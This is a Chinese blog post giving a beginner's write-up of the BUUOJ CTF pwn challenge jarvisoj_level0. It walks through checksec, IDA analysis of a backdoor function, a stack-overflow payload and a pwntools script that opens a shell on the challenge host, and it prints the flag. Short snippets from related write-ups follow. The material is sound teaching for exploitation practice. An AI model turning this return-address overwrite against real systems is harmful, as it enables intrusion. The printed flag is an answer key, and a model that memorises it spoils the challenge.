CTF buuoj pwn-----第6题:jarvisoj_level0

最新推荐文章于 2026-03-30 02:33:25 发布
原创 最新推荐文章于 2026-03-30 02:33:25 发布 · 1.2k 阅读 · 4 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#pwn #安全漏洞 #linux #反汇编
本文记录了一次pwn题目的解决过程,通过checksec分析了64位程序的保护机制,发现存在栈溢出漏洞。利用IDA进行静态分析找到后门函数callsystem()的地址,然后构造payload覆盖返回地址,最终成功执行system(/bin/sh)获取shell,得到了flag。

CTF buuoj pwn-----第6题:jarvisoj_level0

前言

记录一下pwn的过程, 新手学习日记, 流水线记录.
打开题目, 连接靶机,下载文件level0

在这里插入图片描述

一、checksec 检测文件的保护机制

bing@bing-virtual-machine:~/pwn$ checksec ./level0
[*] '/home/bing/pwn/level0'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
bing@bing-virtual-machine:~/pwn$

可以看出它是一个64位程序,仅开启了栈不可执行保护,No PIE. 猜测为 溢出漏洞

  • gdb运行一下:
bing@bing-virtual-machine:~/pwn$ gdb ./level0 
(gdb) r
Starting program: /home/bing/pwn/level0 
Hello, World

二. 静态分析,IDA打开文件

  • IDA打开文件level0

按下shift+f12,打开string window
发现 /bin /sh在这里插入图片描述

  • 双击 /bin /sh, 点击command, 点击X, 发现 /bin /sh的address在可疑函数callsystem()
    在这里插入图片描述
  • 打开后门函数callsystem(),并记下函数地址0x400596

在这里插入图片描述

  • 按下f5,发现callsystem()函数里面含有system("/bin/sh");
    在这里插入图片描述
  • 打开main函数只有两条语句;

在这里插入图片描述

  • 打开vulnerable_function()

在这里插入图片描述

  • buf[128] buf变量分配的空间只有0x80, 而read函数的第三个参数是0x200,可以输入0x200, 显然存在溢出;
    双击buf:
    在这里插入图片描述
  • return address 之前需要覆盖0x88+0x8个字符. 并把return address覆盖为后门函数callsystem()的地址0x400596

构造payload:

payload =b'a'*(0x80+0x8) + p64(0x400596)
  • 0x80个a赋值给buf[128],8个a覆盖栈底s (saved registers),即rbp的值(注意如果是32位系统就是esp,只有4个字节),把后门函数callsystem()的地址0x400596覆盖到vulnerable_function函数的返回地址 r (return addres) , 就可执行system("/bin/sh") ,获取shell.

三. 编写EXP

from pwn import *  

sh = remote('node4.buuoj.cn', 26077)
payload = b'a'*(0x80+0x8)+p64(0x400596) 
sh.sendline(payload)

sh.interactive()

四. 运行EXP, 获取flag

bing@bing-virtual-machine:~/pwn$ python3 ./level0.py
[+] Opening connection to node4.buuoj.cn on port 26077: Done
[*] Switching to interactive mode
Hello, World
$ ls
bin
boot
dev
etc
flag
flag.txt
home
lib
lib32
lib64
media
mnt
opt
proc
pwn
root
run
sbin
srv
sys
tmp
usr
var
$ cat flag
flag{1a6ba01d-1c5e-402c-8e88-080a0a2aed95}

flag{1a6ba01d-1c5e-402c-8e88-080a0a2aed95}

[buuctf]jarvisoj_level0
逆向萌新的博客
05-30 659
[buuctf]jarvisoj_level0
jarvisoj_level0
weixin_56301399的博客
07-21 717
在Functionswindow可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,且callsystem()函数的起始地址为0x400596。双击vulnerable_function()函数可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。buf需覆盖0x80个字节覆盖,再加上rbp的0x8个字节,最后加上callsystem()函数的起始地址0x400596构成payload。信息就了解他是64位即可。...
buuctf-jarvisoj_level0(pwn)
2301_81574836的博客
02-18 696
buuctf-jarvisoj_level0(pwn)
buuctfjarvisoj_level0
weixin_54452942的博客
03-28 1885
64位(system_addr+1)的奥秘
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 5134
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
BUUCTF-PWN实战解析:pwn1_sctf_2016栈溢出与jarvisoj_level0后门利用
最新发布
weixin_30733003的博客
03-30 458
本文深入解析BUUCTF平台上的两道经典PWNpwn1_sctf_2016jarvisoj_level0,重点讲解栈溢出漏洞的原理与利用方法。通过详细的反编译分析、payload构造和调试技巧,帮助读者掌握32位与64位程序下的栈溢出利用技术,包括字符替换漏洞利用和直接后门调用等实战技巧。
BUUCTF jarvisoj_level0 wp
AEJL叁的博客,欢迎关注!
09-17 2432
显示除了NX保护均未开启或完全启用 ,说明此难度系数不高,而NX开启说明数据区域(如栈、堆)不可执行,是防止将写入数据区后跳转执行,所以可优先考虑不利用shellcode注入且简单直接的方式寻找漏洞。main函数的伪C代码提示调用了函数,那么接下来可以进入 vulnerable_function 函数进行分析。(对于write函数的调用,我们放到后续分析)10xDuLL0xD\n函数中使用了read函数:0: 文件描述符。​,通常来自键盘输入或程序重定向bufbuf0x200uLL0x200这是。
CTF buuoj pwn-----第9:jarvisoj_level2
bing_Max的博客
09-27 1014
1. checksec bing@bing-virtual-machine:~/pwn$ checksec ./jarvisoj_level2 [*] '/home/bing/pwn/jarvisoj_level2' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) .
BUU pwn
qq_36495104的博客
05-19 1700
这里基本都是栈溢出,没什么技术含量,只作为记录 [第五空间2019 决赛]PWN5 查看保护 开启了canary和栈不可执行保护 IDA反编译得到main函数 int __cdecl main(int a1) { unsigned int v1; // eax int fd; // ST14_4 int result; // eax char nptr; // [esp+4h] [ebp-80h] char buf; // [esp+14h] [ebp-70h] unsigned
BUUCTF PWN笔记(持续更新!!)
wlmt666的博客
05-19 1271
64位,没有开启保护。点进去没发现明显的漏洞函数,考虑泄露libc基地址的rop构造。先看看有多少gadget估计也够用了。puts函数只接受一个参数,观看汇编看看用的哪个寄存器传输的参数。用的是edi。但是我们怎么找到so的版本呢,因为我们必须要知道so文件种puts函数的偏移量,才可以和泄露出puts的地址结合找到基址。可以用LibcSearch模块来搜索。libcsearch(符号,地址)新的心得:1.64位有效地址是6字节。2.libc.dump是LibcSearch的内置函数。
jarvis oj level0
发蝴蝶和大脑斧的博客
12-01 1034
菜鸟入门,先从level0开始下手。 首先checksec,发现开启了nx保护。 Arch: amd64-64-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) 拖进64位ida,查看vulnerable_function ssize_t...
BUUCTF jarvisoj_level0
小白垃圾笔记2
04-25 575
vulnerable函数是一个漏洞函数:(存在缓溢出),我们只需要将buf溢出到返回地址,返回地址覆盖为sys函数地址即可。在main函数中调用了vulnerable_function()函数。小白垃圾做笔记而已,不建议阅读。这道感觉主要就是64位程序ebp=8。目中给出了shellcode。我们直接将返回地址覆盖就好。exp:这里用下大佬的模板。
【BUUCTF-PWN6-jarvisoj_level0
燕麦葡萄干的博客
07-05 380
buf变量长度为128,但是read可以读入0x200长度的字符,存在栈溢出,需要覆盖的长度为0x80+8。vulnerable_function()函数。64位,开启了NX保护。
[BUUCTF-pwn]——jarvisoj_level1
Y_peak的博客
03-17 707
[BUUCTF-pwn]——jarvisoj_level1 目地址:https://buuoj.cn/challenges#jarvisoj_level1 第一种直接构造shellcode writeup 第二种泄露libc进行操作 from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26361) #p = process("./level1") elf = ELF("./level1") #libc = E
[BUUCTF]PWN——jarvisoj_level3
mcmuyanga的博客
10-28 1385
jarvisoj_level3 附件 步骤 例行检查,32位,nx保护 运行一下程序 32位ida载入,shift+f12没有看到程序里有可以直接利用的后面函数,根据运行时的字符串找到了程序的关键函数 参数buf明显的溢出漏洞,使用ret2libc的办法去获取shell 利用过程: 0x1 利用wire函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_p
[BUUCTF-pwn]——jarvisoj_level2
Y_peak的博客
02-10 1575
[BUUCTF-pwn]——jarvisoj_level2 目地址:https://buuoj.cn/challenges#jarvisoj_level2 checksec 一下下, 32程序 IDA中看下,发现了system函数还是两个,有可利用的栈溢出read函数,shift+F12,还发现了"/bin/sh"字符串. 所以exploit就如下 exploit from pwn import * p = remote("node3.buuoj.cn",28375) binsh = 0
BUUCTF-PWN日记(二)
weixin_45461609的博客
05-15 423
BUUCTF-PWN日记ciscn_2019_n_8not_the_same_3dsctf_2016 ciscn_2019_n_8 送分… ''' Author:3nc0de Date:2020/05/15 ''' from pwn import * r = process('./pwn') #r = remote('node3.buuoj.cn', port) payload=p32(0x11)*14 r.sendline(payload) r.interactive() not_the
[BUUCTF-pwn]——jarvisoj_level2_x64
Y_peak的博客
02-11 504
[BUUCTF-pwn]——jarvisoj_level2_x64 目地址:https://buuoj.cn/challenges#jarvisoj_level2_x64 checksec 一下,64位 ,开启NX保护 64位应该会用到pop rdi这个汇编指令 在IDA中看看 思路:64位先将binsh这个参数放入,rdi寄存器中.紧接着返回并执行system函数 exploit from pwn import * p = remote("node3.buuoj.cn",27828) b
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值